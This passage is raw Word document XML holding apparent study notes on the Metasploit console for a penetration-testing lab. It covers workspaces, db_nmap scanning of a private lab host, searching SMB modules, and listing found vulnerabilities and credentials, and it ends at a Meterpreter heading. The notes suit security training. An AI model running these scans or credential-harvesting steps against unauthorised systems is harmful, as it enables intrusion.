    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "-q" flag means quiet, so it won't output the banners when you start it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db_status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check to see if have database connectivity </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output should be: "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connected to msf. Connection type: postgresql.</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4D3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use [PATH_TO_MODULE]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to use a module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1424"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Show compatible payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004DA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Show categories of stuff inside of msf</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dr1y9tjoi25d" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Work Spaces</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Work Spaces are a helper divider to help you organize different penetration testings, and save findings, like nmap. Workspaces also get saved even after you shut down computer.</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Initializing workspace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">workspace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tells you what workspace you are currently in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">workspace -a [INSERT_NAME]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a workspace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap inside workspace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, let's populate the database and get familiar with some of the Database Backend Commands. For this, we'll scan BRUTE2 with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is a wrapper to execute Nmap inside Metasploit and save the findings in the database. The command has identical syntax to Nmap:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap -A 192.168.50.202</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap scan and this also saves all the hosts in metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Displays all the hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running db_nmap, all the host information is saved in msf automatically</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">services </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">services -p 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">display the discovered services from our port scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The second one filters by port number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1xoj8lcjzwri" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Miscellaneous </w:t>
      </w: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t xml:space="preserve">Search:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1489"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search type:auxiliary smb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1489"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search for all SMB auxiliary modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1489"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you find one you like, like number 56, then you can do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1489"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use 56</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Vulnerabilities and Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1371"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vulns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1371"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running a module, you can run this command to see if metasploit automatically found a vulnerability,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostly for scanners</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1371"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">creds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1371"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running a scanner module that finds credentials (ex. bruteforce), you can run this command to display them</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004FF">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000500">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Information about module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000501">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000502">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="448"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this while inside of a module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000503">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
        <w:ind w:left="72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504">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="448"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows options for the exploit, like what RHOSTS and stuff</w:t>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pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_toau08fuka4w" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter and Staged Payloads</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERY IMPORTANT: Meterpreter and staged payloads both need Metasploit handler (multi/handler)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000509">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000050A">
